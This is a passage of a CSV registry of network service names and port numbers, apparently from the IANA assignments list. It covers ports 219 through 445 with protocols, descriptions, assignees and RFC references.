uarps,219,tcp,Unisys ARPs,[Ashok_Marwaha],[Ashok_Marwaha],,,,,, uarps,219,udp,Unisys ARPs,[Ashok_Marwaha],[Ashok_Marwaha],,,,,, imap3,220,tcp,Interactive Mail Access Protocol v3,[James_Rice],[James_Rice],,,,,, imap3,220,udp,Interactive Mail Access Protocol v3,[James_Rice],[James_Rice],,,,,, fln-spx,221,tcp,Berkeley rlogind with SPX auth,,,,,,,, fln-spx,221,udp,Berkeley rlogind with SPX auth,,,,,,,, rsh-spx,222,tcp,Berkeley rshd with SPX auth,,,,,,,, rsh-spx,222,udp,Berkeley rshd with SPX auth,,,,,,,, cdc,223,tcp,Certificate Distribution Center,[Kannan_Alagappan],[Kannan_Alagappan],,,,,, cdc,223,udp,Certificate Distribution Center,[Kannan_Alagappan],[Kannan_Alagappan],,,,,, masqdialer,224,tcp,masqdialer,[Charles_Wright],[Charles_Wright],,,,,,"Possible Conflict of Port 222 with ""Masqdialer""" masqdialer,224,udp,masqdialer,[Charles_Wright],[Charles_Wright],,,,,,"Possible Conflict of Port 222 with ""Masqdialer""" ,225-241,,Reserved,[Jon_Postel],[Jon_Postel],,,,,, direct,242,tcp,Direct,[Herb_Sutter],[Herb_Sutter],,,,,, direct,242,udp,Direct,[Herb_Sutter],[Herb_Sutter],,,,,, sur-meas,243,tcp,Survey Measurement,[Dave_Clark],[Dave_Clark],,,,,, sur-meas,243,udp,Survey Measurement,[Dave_Clark],[Dave_Clark],,,,,, inbusiness,244,tcp,inbusiness,[Derrick_Hisatake],[Derrick_Hisatake],,,,,, inbusiness,244,udp,inbusiness,[Derrick_Hisatake],[Derrick_Hisatake],,,,,, link,245,tcp,LINK,,,,,,,, link,245,udp,LINK,,,,,,,, dsp3270,246,tcp,Display Systems Protocol,[Weldon_J_Showalter],[Weldon_J_Showalter],,,,,, dsp3270,246,udp,Display Systems Protocol,[Weldon_J_Showalter],[Weldon_J_Showalter],,,,,, subntbcst-tftp,247,tcp,"SUBNTBCST_TFTP IANA assigned this well-formed service name as a replacement for ""subntbcst_tftp"".",[John_Fake],[John_Fake],,,,,, subntbcst_tftp,247,tcp,SUBNTBCST_TFTP,[John_Fake],[John_Fake],,,,,,"This entry is an alias to ""subntbcst-tftp"". This entry is now historic, not usable for use with many common service discovery mechanisms." subntbcst-tftp,247,udp,"SUBNTBCST_TFTP IANA assigned this well-formed service name as a replacement for ""subntbcst_tftp"".",[John_Fake],[John_Fake],,,,,, subntbcst_tftp,247,udp,SUBNTBCST_TFTP,[John_Fake],[John_Fake],,,,,,"This entry is an alias to ""subntbcst-tftp"". This entry is now historic, not usable for use with many common service discovery mechanisms." bhfhs,248,tcp,bhfhs,[John_Kelly],[John_Kelly],,,,,, bhfhs,248,udp,bhfhs,[John_Kelly],[John_Kelly],,,,,, ,249-255,,Reserved,[Jon_Postel],[Jon_Postel],,,,,, rap,256,tcp,RAP,[J_S_Greenfield],[J_S_Greenfield],,,,,, rap,256,udp,RAP,[J_S_Greenfield],[J_S_Greenfield],,,,,, set,257,tcp,Secure Electronic Transaction,[Donald_Eastlake],[Donald_Eastlake],,,,,, set,257,udp,Secure Electronic Transaction,[Donald_Eastlake],[Donald_Eastlake],,,,,, ,258,,Unassigned,,,,2006-09-13,,,, esro-gen,259,tcp,Efficient Short Remote Operations,[Mohsen_Banan],[Mohsen_Banan],,,,,, esro-gen,259,udp,Efficient Short Remote Operations,[Mohsen_Banan],[Mohsen_Banan],,,,,, openport,260,tcp,Openport,[John_Marland],[John_Marland],,,,,, openport,260,udp,Openport,[John_Marland],[John_Marland],,,,,, nsiiops,261,tcp,IIOP Name Service over TLS/SSL,[Jeff_Stewart],[Jeff_Stewart],,,,,, nsiiops,261,udp,IIOP Name Service over TLS/SSL,[Jeff_Stewart],[Jeff_Stewart],,,,,, arcisdms,262,tcp,Arcisdms,[Russell_Crook],[Russell_Crook],,,,,, arcisdms,262,udp,Arcisdms,[Russell_Crook],[Russell_Crook],,,,,, hdap,263,tcp,HDAP,[Troy_Gau],[Troy_Gau],,,,,, hdap,263,udp,HDAP,[Troy_Gau],[Troy_Gau],,,,,, bgmp,264,tcp,BGMP,[Dave_Thaler],[Dave_Thaler],,,,,, bgmp,264,udp,BGMP,[Dave_Thaler],[Dave_Thaler],,,,,, x-bone-ctl,265,tcp,X-Bone CTL,[Joe_Touch],[Joe_Touch],,,,,, x-bone-ctl,265,udp,X-Bone CTL,[Joe_Touch],[Joe_Touch],,,,,, sst,266,tcp,SCSI on ST,[Donald_D_Woelz],[Donald_D_Woelz],,,,,, sst,266,udp,SCSI on ST,[Donald_D_Woelz],[Donald_D_Woelz],,,,,, td-service,267,tcp,Tobit David Service Layer,,,,,,,, td-service,267,udp,Tobit David Service Layer,,,,,,,, td-replica,268,tcp,Tobit David Replica,[Franz_Josef_Leuders],[Franz_Josef_Leuders],,,,,, td-replica,268,udp,Tobit David Replica,[Franz_Josef_Leuders],[Franz_Josef_Leuders],,,,,, manet,269,tcp,MANET Protocols,,,,,[RFC5498],,, manet,269,udp,MANET Protocols,,,,,[RFC5498],,, ,270,tcp,Reserved,,,,,,,, gist,270,udp,Q-mode encapsulation for GIST messages,,,,,[RFC5971],,, pt-tls,271,tcp,IETF Network Endpoint Assessment (NEA) Posture Transport Protocol over TLS (PT-TLS),[IESG],[IETF_Chair],2012-07-31,,[RFC6876],,, ,271,udp,Reserved,,,,,,,, ,272-279,,Unassigned,,,,,,,, http-mgmt,280,tcp,http-mgmt,[Adrian_Pell],[Adrian_Pell],,,,,, http-mgmt,280,udp,http-mgmt,[Adrian_Pell],[Adrian_Pell],,,,,, personal-link,281,tcp,Personal Link,[Dan_Cummings],[Dan_Cummings],,,,,, personal-link,281,udp,Personal Link,[Dan_Cummings],[Dan_Cummings],,,,,, cableport-ax,282,tcp,Cable Port A/X,[Craig_Langfahl],[Craig_Langfahl],,,,,, cableport-ax,282,udp,Cable Port A/X,[Craig_Langfahl],[Craig_Langfahl],,,,,, rescap,283,tcp,rescap,[Paul_Hoffman],[Paul_Hoffman],,,,,, rescap,283,udp,rescap,[Paul_Hoffman],[Paul_Hoffman],,,,,, corerjd,284,tcp,corerjd,[Chris_Thornhill],[Chris_Thornhill],,,,,, corerjd,284,udp,corerjd,[Chris_Thornhill],[Chris_Thornhill],,,,,, ,285,,Unassigned,,,,,,,, fxp,286,tcp,FXP Communication,[James_Darnall],[James_Darnall],,,,,, fxp,286,udp,FXP Communication,[James_Darnall],[James_Darnall],,,,,, k-block,287,tcp,K-BLOCK,[Simon_P_Jackson],[Simon_P_Jackson],,,,,, k-block,287,udp,K-BLOCK,[Simon_P_Jackson],[Simon_P_Jackson],,,,,, ,288-307,,Unassigned,,,,,,,, novastorbakcup,308,tcp,Novastor Backup,[Brian_Dickman],[Brian_Dickman],,,,,, novastorbakcup,308,udp,Novastor Backup,[Brian_Dickman],[Brian_Dickman],,,,,, entrusttime,309,tcp,EntrustTime,[Peter_Whittaker],[Peter_Whittaker],,,,,, entrusttime,309,udp,EntrustTime,[Peter_Whittaker],[Peter_Whittaker],,,,,, bhmds,310,tcp,bhmds,[John_Kelly],[John_Kelly],,,,,, bhmds,310,udp,bhmds,[John_Kelly],[John_Kelly],,,,,, asip-webadmin,311,tcp,AppleShare IP WebAdmin,[Ann_Huang],[Ann_Huang],,,,,, asip-webadmin,311,udp,AppleShare IP WebAdmin,[Ann_Huang],[Ann_Huang],,,,,, vslmp,312,tcp,VSLMP,[Gerben_Wierda],[Gerben_Wierda],,,,,, vslmp,312,udp,VSLMP,[Gerben_Wierda],[Gerben_Wierda],,,,,, magenta-logic,313,tcp,Magenta Logic,[Karl_Rousseau],[Karl_Rousseau],,,,,, magenta-logic,313,udp,Magenta Logic,[Karl_Rousseau],[Karl_Rousseau],,,,,, opalis-robot,314,tcp,Opalis Robot,[Laurent_Domenech],[Laurent_Domenech],,,,,, opalis-robot,314,udp,Opalis Robot,[Laurent_Domenech],[Laurent_Domenech],,,,,, dpsi,315,tcp,DPSI,[Tony_Scamurra],[Tony_Scamurra],,,,,, dpsi,315,udp,DPSI,[Tony_Scamurra],[Tony_Scamurra],,,,,, decauth,316,tcp,decAuth,[Michael_Agishtein],[Michael_Agishtein],,,,,, decauth,316,udp,decAuth,[Michael_Agishtein],[Michael_Agishtein],,,,,, zannet,317,tcp,Zannet,[Zan_Oliphant],[Zan_Oliphant],,,,,, zannet,317,udp,Zannet,[Zan_Oliphant],[Zan_Oliphant],,,,,, pkix-timestamp,318,tcp,PKIX TimeStamp,[Robert_Zuccherato],[Robert_Zuccherato],,,,,, pkix-timestamp,318,udp,PKIX TimeStamp,[Robert_Zuccherato],[Robert_Zuccherato],,,,,, ptp-event,319,tcp,PTP Event,[Kang_Lee],[Kang_Lee],2010-07-27,,,,, ptp-event,319,udp,PTP Event,[Kang_Lee],[Kang_Lee],2010-07-27,,,,, ptp-general,320,tcp,PTP General,[Kang_Lee],[Kang_Lee],2010-07-27,,,,, ptp-general,320,udp,PTP General,[Kang_Lee],[Kang_Lee],2010-07-27,,,,, pip,321,tcp,PIP,[Gordon_Mohr],[Gordon_Mohr],,,,,, pip,321,udp,PIP,[Gordon_Mohr],[Gordon_Mohr],,,,,, rtsps,322,tcp,RTSPS,[Anders_Klemets],[Anders_Klemets],,,,,, rtsps,322,udp,RTSPS,[Anders_Klemets],[Anders_Klemets],,,,,, rpki-rtr,323,tcp,Resource PKI to Router Protocol,[IESG],[IETF_Chair],,,[RFC6810],,, ,323,udp,Reserved,,,,,,,, rpki-rtr-tls,324,tcp,Resource PKI to Router Protocol over TLS,[IESG],[IETF_Chair],,,[RFC6810],,, ,324,udp,Reserved,,,,,,,, ,325-332,,Unassigned,,,,,,,, texar,333,tcp,Texar Security Port,[Eugen_Bacic],[Eugen_Bacic],,,,,, texar,333,udp,Texar Security Port,[Eugen_Bacic],[Eugen_Bacic],,,,,, ,334-343,,Unassigned,,,,,,,, pdap,344,tcp,Prospero Data Access Protocol,[B_Clifford_Neuman],[B_Clifford_Neuman],,,,,, pdap,344,udp,Prospero Data Access Protocol,[B_Clifford_Neuman],[B_Clifford_Neuman],,,,,, pawserv,345,tcp,Perf Analysis Workbench,,,,,,,, pawserv,345,udp,Perf Analysis Workbench,,,,,,,, zserv,346,tcp,Zebra server,,,,,,,, zserv,346,udp,Zebra server,,,,,,,, fatserv,347,tcp,Fatmen Server,,,,,,,, fatserv,347,udp,Fatmen Server,,,,,,,, csi-sgwp,348,tcp,Cabletron Management Protocol,,,,,,,, csi-sgwp,348,udp,Cabletron Management Protocol,,,,,,,, mftp,349,tcp,mftp,[Dave_Feinleib],[Dave_Feinleib],,,,,, mftp,349,udp,mftp,[Dave_Feinleib],[Dave_Feinleib],,,,,, matip-type-a,350,tcp,MATIP Type A,[Alain_Robert],[Alain_Robert],,,[RFC2351],,, matip-type-a,350,udp,MATIP Type A,[Alain_Robert],[Alain_Robert],,,[RFC2351],,, matip-type-b,351,tcp,MATIP Type B,[Alain_Robert],[Alain_Robert],,,[RFC2351],,, matip-type-b,351,udp,MATIP Type B,[Alain_Robert],[Alain_Robert],,,[RFC2351],,, bhoetty,351,tcp,bhoetty,[John_Kelly],[John_Kelly],,,,,,"This entry records an unassigned but widespread use (added 5/21/97)" bhoetty,351,udp,bhoetty,[John_Kelly],[John_Kelly],,,,,,"This entry records an unassigned but widespread use (added 5/21/97)" dtag-ste-sb,352,tcp,DTAG,[Ruediger_Wald],[Ruediger_Wald],,,,,,(assigned long ago) dtag-ste-sb,352,udp,DTAG,[Ruediger_Wald],[Ruediger_Wald],,,,,,(assigned long ago) bhoedap4,352,tcp,bhoedap4,[John_Kelly],[John_Kelly],,,,,,"This entry records an unassigned but widespread use (added 5/21/97)" bhoedap4,352,udp,bhoedap4,[John_Kelly],[John_Kelly],,,,,,"This entry records an unassigned but widespread use (added 5/21/97)" ndsauth,353,tcp,NDSAUTH,[Jayakumar_Ramalingam],[Jayakumar_Ramalingam],,,,,, ndsauth,353,udp,NDSAUTH,[Jayakumar_Ramalingam],[Jayakumar_Ramalingam],,,,,, bh611,354,tcp,bh611,[John_Kelly],[John_Kelly],,,,,, bh611,354,udp,bh611,[John_Kelly],[John_Kelly],,,,,, datex-asn,355,tcp,DATEX-ASN,[Kenneth_Vaughn],[Kenneth_Vaughn],,,,,, datex-asn,355,udp,DATEX-ASN,[Kenneth_Vaughn],[Kenneth_Vaughn],,,,,, cloanto-net-1,356,tcp,Cloanto Net 1,[Michael_Battilana],[Michael_Battilana],2010-04-30,,,,, cloanto-net-1,356,udp,Cloanto Net 1,[Michael_Battilana],[Michael_Battilana],2010-04-30,,,,, bhevent,357,tcp,bhevent,[John_Kelly],[John_Kelly],,,,,, bhevent,357,udp,bhevent,[John_Kelly],[John_Kelly],,,,,, shrinkwrap,358,tcp,Shrinkwrap,[Bill_Simpson],[Bill_Simpson],,,,,, shrinkwrap,358,udp,Shrinkwrap,[Bill_Simpson],[Bill_Simpson],,,,,, nsrmp,359,tcp,Network Security Risk Management Protocol,[Eric_Jacksch],[Eric_Jacksch],,,,,, nsrmp,359,udp,Network Security Risk Management Protocol,[Eric_Jacksch],[Eric_Jacksch],,,,,, scoi2odialog,360,tcp,scoi2odialog,[Keith_Petley],[Keith_Petley],,,,,, scoi2odialog,360,udp,scoi2odialog,[Keith_Petley],[Keith_Petley],,,,,, semantix,361,tcp,Semantix,[Semantix],[Semantix],,,,,, semantix,361,udp,Semantix,[Semantix],[Semantix],,,,,, srssend,362,tcp,SRS Send,[Curt_Mayer],[Curt_Mayer],,,,,, srssend,362,udp,SRS Send,[Curt_Mayer],[Curt_Mayer],,,,,, rsvp-tunnel,363,tcp,"RSVP Tunnel IANA assigned this well-formed service name as a replacement for ""rsvp_tunnel"".",[Andreas_Terzis],[Andreas_Terzis],,,,,, rsvp_tunnel,363,tcp,RSVP Tunnel,[Andreas_Terzis],[Andreas_Terzis],,,,,,"This entry is an alias to ""rsvp-tunnel"". This entry is now historic, not usable for use with many common service discovery mechanisms." rsvp-tunnel,363,udp,"RSVP Tunnel IANA assigned this well-formed service name as a replacement for ""rsvp_tunnel"".",[Andreas_Terzis],[Andreas_Terzis],,,,,, rsvp_tunnel,363,udp,RSVP Tunnel,[Andreas_Terzis],[Andreas_Terzis],,,,,,"This entry is an alias to ""rsvp-tunnel"". This entry is now historic, not usable for use with many common service discovery mechanisms." aurora-cmgr,364,tcp,Aurora CMGR,[Philip_Budne],[Philip_Budne],,,,,, aurora-cmgr,364,udp,Aurora CMGR,[Philip_Budne],[Philip_Budne],,,,,, dtk,365,tcp,DTK,[Fred_Cohen],[Fred_Cohen],,,,,, dtk,365,udp,DTK,[Fred_Cohen],[Fred_Cohen],,,,,, odmr,366,tcp,ODMR,[Randall_Gellens],[Randall_Gellens],,,,,, odmr,366,udp,ODMR,[Randall_Gellens],[Randall_Gellens],,,,,, mortgageware,367,tcp,MortgageWare,[Ole_Hellevik],[Ole_Hellevik],,,,,, mortgageware,367,udp,MortgageWare,[Ole_Hellevik],[Ole_Hellevik],,,,,, qbikgdp,368,tcp,QbikGDP,[Adrien_de_Croy],[Adrien_de_Croy],,,,,, qbikgdp,368,udp,QbikGDP,[Adrien_de_Croy],[Adrien_de_Croy],,,,,, rpc2portmap,369,tcp,rpc2portmap,,,,,,,, rpc2portmap,369,udp,rpc2portmap,,,,,,,, codaauth2,370,tcp,codaauth2,[Robert_Watson],[Robert_Watson],,,,,, codaauth2,370,udp,codaauth2,[Robert_Watson],[Robert_Watson],,,,,, clearcase,371,tcp,Clearcase,[Dave_LeBlang],[Dave_LeBlang],,,,,, clearcase,371,udp,Clearcase,[Dave_LeBlang],[Dave_LeBlang],,,,,, ulistproc,372,tcp,ListProcessor,[Anastasios_Kotsikona],[Anastasios_Kotsikona],,,,,, ulistproc,372,udp,ListProcessor,[Anastasios_Kotsikona],[Anastasios_Kotsikona],,,,,, legent-1,373,tcp,Legent Corporation,,,,,,,, legent-1,373,udp,Legent Corporation,,,,,,,, legent-2,374,tcp,Legent Corporation,[Keith_Boyce],[Keith_Boyce],,,,,, legent-2,374,udp,Legent Corporation,[Keith_Boyce],[Keith_Boyce],,,,,, hassle,375,tcp,Hassle,[Reinhard_Doelz],[Reinhard_Doelz],,,,,, hassle,375,udp,Hassle,[Reinhard_Doelz],[Reinhard_Doelz],,,,,, nip,376,tcp,Amiga Envoy Network Inquiry Proto,[Heinz_Wrobel],[Heinz_Wrobel],,,,,, nip,376,udp,Amiga Envoy Network Inquiry Proto,[Heinz_Wrobel],[Heinz_Wrobel],,,,,, tnETOS,377,tcp,NEC Corporation,,,,,,,, tnETOS,377,udp,NEC Corporation,,,,,,,, dsETOS,378,tcp,NEC Corporation,[Tomoo_Fujita],[Tomoo_Fujita],,,,,, dsETOS,378,udp,NEC Corporation,[Tomoo_Fujita],[Tomoo_Fujita],,,,,, is99c,379,tcp,TIA/EIA/IS-99 modem client,,,,,,,, is99c,379,udp,TIA/EIA/IS-99 modem client,,,,,,,, is99s,380,tcp,TIA/EIA/IS-99 modem server,[Frank_Quick],[Frank_Quick],,,,,, is99s,380,udp,TIA/EIA/IS-99 modem server,[Frank_Quick],[Frank_Quick],,,,,, hp-collector,381,tcp,hp performance data collector,,,,,,,, hp-collector,381,udp,hp performance data collector,,,,,,,, hp-managed-node,382,tcp,hp performance data managed node,,,,,,,, hp-managed-node,382,udp,hp performance data managed node,,,,,,,, hp-alarm-mgr,383,tcp,hp performance data alarm manager,[Frank_Blakely],[Frank_Blakely],,,,,, hp-alarm-mgr,383,udp,hp performance data alarm manager,[Frank_Blakely],[Frank_Blakely],,,,,, arns,384,tcp,A Remote Network Server System,[David_Hornsby],[David_Hornsby],,,,,, arns,384,udp,A Remote Network Server System,[David_Hornsby],[David_Hornsby],,,,,, ibm-app,385,tcp,IBM Application,[Lisa_Tomita],[Lisa_Tomita],,,,,, ibm-app,385,udp,IBM Application,[Lisa_Tomita],[Lisa_Tomita],,,,,, asa,386,tcp,ASA Message Router Object Def.,[Steve_Laitinen],[Steve_Laitinen],,,,,, asa,386,udp,ASA Message Router Object Def.,[Steve_Laitinen],[Steve_Laitinen],,,,,, aurp,387,tcp,Appletalk Update-Based Routing Pro.,[Chris_Ranch],[Chris_Ranch],,,,,, aurp,387,udp,Appletalk Update-Based Routing Pro.,[Chris_Ranch],[Chris_Ranch],,,,,, unidata-ldm,388,tcp,Unidata LDM,[University_Corporation_for_Atmospheric_Research2],[Steven_Emmerson2],,2012-05-18,,,, unidata-ldm,388,udp,Unidata LDM,[University_Corporation_for_Atmospheric_Research2],[Steven_Emmerson2],,2012-05-18,,,, ldap,389,tcp,Lightweight Directory Access Protocol,[Tim_Howes],[Tim_Howes],,,,,, ldap,389,udp,Lightweight Directory Access Protocol,[Tim_Howes],[Tim_Howes],,,,,, uis,390,tcp,UIS,[Ed_Barron],[Ed_Barron],,,,,, uis,390,udp,UIS,[Ed_Barron],[Ed_Barron],,,,,, synotics-relay,391,tcp,SynOptics SNMP Relay Port,,,,,,,, synotics-relay,391,udp,SynOptics SNMP Relay Port,,,,,,,, synotics-broker,392,tcp,SynOptics Port Broker Port,[Illan_Raab],[Illan_Raab],,,,,, synotics-broker,392,udp,SynOptics Port Broker Port,[Illan_Raab],[Illan_Raab],,,,,, meta5,393,tcp,Meta5,[Jim_Kanzler],[Jim_Kanzler],,,,,, meta5,393,udp,Meta5,[Jim_Kanzler],[Jim_Kanzler],,,,,, embl-ndt,394,tcp,EMBL Nucleic Data Transfer,[Peter_Gad],[Peter_Gad],,,,,, embl-ndt,394,udp,EMBL Nucleic Data Transfer,[Peter_Gad],[Peter_Gad],,,,,, netcp,395,tcp,NetScout Control Protocol,[Ashwani_Singhal],[Ashwani_Singhal],2010-04-07,,,,, netcp,395,udp,NetScout Control Protocol,[Ashwani_Singhal],[Ashwani_Singhal],2010-04-07,,,,, netware-ip,396,tcp,Novell Netware over IP,,,,,,,, netware-ip,396,udp,Novell Netware over IP,,,,,,,, mptn,397,tcp,Multi Protocol Trans. Net.,[Soumitra_Sarkar],[Soumitra_Sarkar],,,,,, mptn,397,udp,Multi Protocol Trans. Net.,[Soumitra_Sarkar],[Soumitra_Sarkar],,,,,, kryptolan,398,tcp,Kryptolan,[Peter_de_Laval],[Peter_de_Laval],,,,,, kryptolan,398,udp,Kryptolan,[Peter_de_Laval],[Peter_de_Laval],,,,,, iso-tsap-c2,399,tcp,ISO Transport Class 2 Non-Control over TCP,[Yanick_Pouffary],[Yanick_Pouffary],,,,,, iso-tsap-c2,399,udp,ISO Transport Class 2 Non-Control over UDP,[Yanick_Pouffary],[Yanick_Pouffary],,,,,, osb-sd,400,tcp,Oracle Secure Backup,[Joseph_Dziedzic],[Joseph_Dziedzic],2008-06-06,,,,,Formerly was Workstation Solutions osb-sd,400,udp,Oracle Secure Backup,[Joseph_Dziedzic],[Joseph_Dziedzic],2008-06-06,,,,,Formerly was Workstation Solutions ups,401,tcp,Uninterruptible Power Supply,[Charles_Bennett],[Charles_Bennett],2008-08-29,,,,, ups,401,udp,Uninterruptible Power Supply,[Charles_Bennett],[Charles_Bennett],2008-08-29,,,,, genie,402,tcp,Genie Protocol,[Mark_Hankin],[Mark_Hankin],,,,,, genie,402,udp,Genie Protocol,[Mark_Hankin],[Mark_Hankin],,,,,, decap,403,tcp,decap,,,,,,,, decap,403,udp,decap,,,,,,,, nced,404,tcp,nced,,,,,,,, nced,404,udp,nced,,,,,,,, ncld,405,tcp,ncld,[Richard_Jones],[Richard_Jones],,,,,, ncld,405,udp,ncld,[Richard_Jones],[Richard_Jones],,,,,, imsp,406,tcp,Interactive Mail Support Protocol,[John_Myers],[John_Myers],,,,,, imsp,406,udp,Interactive Mail Support Protocol,[John_Myers],[John_Myers],,,,,, timbuktu,407,tcp,Timbuktu,[Marc_Epard],[Marc_Epard],,,,,, timbuktu,407,udp,Timbuktu,[Marc_Epard],[Marc_Epard],,,,,, prm-sm,408,tcp,Prospero Resource Manager Sys. Man.,,,,,,,, prm-sm,408,udp,Prospero Resource Manager Sys. Man.,,,,,,,, prm-nm,409,tcp,Prospero Resource Manager Node Man.,[B_Clifford_Neuman],[B_Clifford_Neuman],,,,,, prm-nm,409,udp,Prospero Resource Manager Node Man.,[B_Clifford_Neuman],[B_Clifford_Neuman],,,,,, decladebug,410,tcp,DECLadebug Remote Debug Protocol,[Hewlett_Packard],[Hewlett_Packard],,,,,, decladebug,410,udp,DECLadebug Remote Debug Protocol,[Hewlett_Packard],[Hewlett_Packard],,,,,, rmt,411,tcp,Remote MT Protocol,[Peter_Eriksson],[Peter_Eriksson],,,,,, rmt,411,udp,Remote MT Protocol,[Peter_Eriksson],[Peter_Eriksson],,,,,, synoptics-trap,412,tcp,Trap Convention Port,[Illan_Raab],[Illan_Raab],,,,,, synoptics-trap,412,udp,Trap Convention Port,[Illan_Raab],[Illan_Raab],,,,,, smsp,413,tcp,Storage Management Services Protocol,[Murthy_Srinivas],[Murthy_Srinivas],,,,,, smsp,413,udp,Storage Management Services Protocol,[Murthy_Srinivas],[Murthy_Srinivas],,,,,, infoseek,414,tcp,InfoSeek,[Steve_Kirsch],[Steve_Kirsch],,,,,, infoseek,414,udp,InfoSeek,[Steve_Kirsch],[Steve_Kirsch],,,,,, bnet,415,tcp,BNet,[Jim_Mertz],[Jim_Mertz],,,,,, bnet,415,udp,BNet,[Jim_Mertz],[Jim_Mertz],,,,,, silverplatter,416,tcp,Silverplatter,[Peter_Ciuffetti],[Peter_Ciuffetti],,,,,, silverplatter,416,udp,Silverplatter,[Peter_Ciuffetti],[Peter_Ciuffetti],,,,,, onmux,417,tcp,Onmux,[Stephen_Hanna],[Stephen_Hanna],,,,,, onmux,417,udp,Onmux,[Stephen_Hanna],[Stephen_Hanna],,,,,, hyper-g,418,tcp,Hyper-G,[Frank_Kappe],[Frank_Kappe],,,,,, hyper-g,418,udp,Hyper-G,[Frank_Kappe],[Frank_Kappe],,,,,, ariel1,419,tcp,Ariel 1,[Joel_Karafin],[Joel_Karafin],,,,,, ariel1,419,udp,Ariel 1,[Joel_Karafin],[Joel_Karafin],,,,,, smpte,420,tcp,SMPTE,[Si_Becker],[Si_Becker],,,,,, smpte,420,udp,SMPTE,[Si_Becker],[Si_Becker],,,,,, ariel2,421,tcp,Ariel 2,,,,,,,, ariel2,421,udp,Ariel 2,,,,,,,, ariel3,422,tcp,Ariel 3,[Joel_Karafin],[Joel_Karafin],,,,,, ariel3,422,udp,Ariel 3,[Joel_Karafin],[Joel_Karafin],,,,,, opc-job-start,423,tcp,IBM Operations Planning and Control Start,,,,,,,, opc-job-start,423,udp,IBM Operations Planning and Control Start,,,,,,,, opc-job-track,424,tcp,IBM Operations Planning and Control Track,[Conny_Larsson],[Conny_Larsson],,,,,, opc-job-track,424,udp,IBM Operations Planning and Control Track,[Conny_Larsson],[Conny_Larsson],,,,,, icad-el,425,tcp,ICAD,[Larry_Stone],[Larry_Stone],,,,,, icad-el,425,udp,ICAD,[Larry_Stone],[Larry_Stone],,,,,, smartsdp,426,tcp,smartsdp,[Marie_Pierre_Belange],[Marie_Pierre_Belange],,,,,, smartsdp,426,udp,smartsdp,[Marie_Pierre_Belange],[Marie_Pierre_Belange],,,,,, svrloc,427,tcp,Server Location,[Veizades],[Veizades],,,,,, svrloc,427,udp,Server Location,[Veizades],[Veizades],,,,,, ocs-cmu,428,tcp,"OCS_CMU IANA assigned this well-formed service name as a replacement for ""ocs_cmu"".",,,,,,,, ocs_cmu,428,tcp,OCS_CMU,,,,,,,,"This entry is an alias to ""ocs-cmu"". This entry is now historic, not usable for use with many common service discovery mechanisms." ocs-cmu,428,udp,"OCS_CMU IANA assigned this well-formed service name as a replacement for ""ocs_cmu"".",,,,,,,, ocs_cmu,428,udp,OCS_CMU,,,,,,,,"This entry is an alias to ""ocs-cmu"". This entry is now historic, not usable for use with many common service discovery mechanisms." ocs-amu,429,tcp,"OCS_AMU IANA assigned this well-formed service name as a replacement for ""ocs_amu"".",[Florence_Wyman],[Florence_Wyman],,,,,, ocs_amu,429,tcp,OCS_AMU,[Florence_Wyman],[Florence_Wyman],,,,,,"This entry is an alias to ""ocs-amu"". This entry is now historic, not usable for use with many common service discovery mechanisms." ocs-amu,429,udp,"OCS_AMU IANA assigned this well-formed service name as a replacement for ""ocs_amu"".",[Florence_Wyman],[Florence_Wyman],,,,,, ocs_amu,429,udp,OCS_AMU,[Florence_Wyman],[Florence_Wyman],,,,,,"This entry is an alias to ""ocs-amu"". This entry is now historic, not usable for use with many common service discovery mechanisms." utmpsd,430,tcp,UTMPSD,,,,,,,, utmpsd,430,udp,UTMPSD,,,,,,,, utmpcd,431,tcp,UTMPCD,,,,,,,, utmpcd,431,udp,UTMPCD,,,,,,,, iasd,432,tcp,IASD,[Nir_Baroz],[Nir_Baroz],,,,,, iasd,432,udp,IASD,[Nir_Baroz],[Nir_Baroz],,,,,, nnsp,433,tcp,NNSP,[Rob_Robertson],[Rob_Robertson],,,,,, nnsp,433,udp,NNSP,[Rob_Robertson],[Rob_Robertson],,,,,, mobileip-agent,434,tcp,MobileIP-Agent,,,,,,,, mobileip-agent,434,udp,MobileIP-Agent,,,,,,,, mobilip-mn,435,tcp,MobilIP-MN,[Kannan_Alagappan_2],[Kannan_Alagappan_2],,,,,, mobilip-mn,435,udp,MobilIP-MN,[Kannan_Alagappan_2],[Kannan_Alagappan_2],,,,,, dna-cml,436,tcp,DNA-CML,[Dan_Flowers],[Dan_Flowers],,,,,, dna-cml,436,udp,DNA-CML,[Dan_Flowers],[Dan_Flowers],,,,,, comscm,437,tcp,comscm,[Jim_Teague],[Jim_Teague],,,,,, comscm,437,udp,comscm,[Jim_Teague],[Jim_Teague],,,,,, dsfgw,438,tcp,dsfgw,[Andy_McKeen],[Andy_McKeen],,,,,, dsfgw,438,udp,dsfgw,[Andy_McKeen],[Andy_McKeen],,,,,, dasp,439,tcp,dasp,[Thomas_Obermair],[Thomas_Obermair],,,,,, dasp,439,udp,dasp,[Thomas_Obermair],[Thomas_Obermair],,,,,, sgcp,440,tcp,sgcp,[Marshall_Rose],[Marshall_Rose],,,,,, sgcp,440,udp,sgcp,[Marshall_Rose],[Marshall_Rose],,,,,, decvms-sysmgt,441,tcp,decvms-sysmgt,[Lee_Barton],[Lee_Barton],,,,,, decvms-sysmgt,441,udp,decvms-sysmgt,[Lee_Barton],[Lee_Barton],,,,,, cvc-hostd,442,tcp,"cvc_hostd IANA assigned this well-formed service name as a replacement for ""cvc_hostd"".",[Bill_Davidson],[Bill_Davidson],,,,,, cvc_hostd,442,tcp,cvc_hostd,[Bill_Davidson],[Bill_Davidson],,,,,,"This entry is an alias to ""cvc-hostd"". This entry is now historic, not usable for use with many common service discovery mechanisms." cvc-hostd,442,udp,"cvc_hostd IANA assigned this well-formed service name as a replacement for ""cvc_hostd"".",[Bill_Davidson],[Bill_Davidson],,,,,, cvc_hostd,442,udp,cvc_hostd,[Bill_Davidson],[Bill_Davidson],,,,,,"This entry is an alias to ""cvc-hostd"". This entry is now historic, not usable for use with many common service discovery mechanisms." https,443,tcp,http protocol over TLS/SSL,[Kipp_E_B_Hickman],[Kipp_E_B_Hickman],,,,,, https,443,udp,http protocol over TLS/SSL,[Kipp_E_B_Hickman],[Kipp_E_B_Hickman],,,,,, https,443,sctp,HTTPS,[Randall_Stewart],[Randall_Stewart],,,[RFC4960],,, snpp,444,tcp,Simple Network Paging Protocol,,,,,[RFC1568],,, snpp,444,udp,Simple Network Paging Protocol,,,,,[RFC1568],,, microsoft-ds,445,tcp,Microsoft-DS,[Pradeep_Bahl],[Pradeep_Bahl],,,,,, microsoft-ds,445,udp,Microsoft-DS,[Pradeep_Bahl],[Pradeep_Bahl],,,,,, 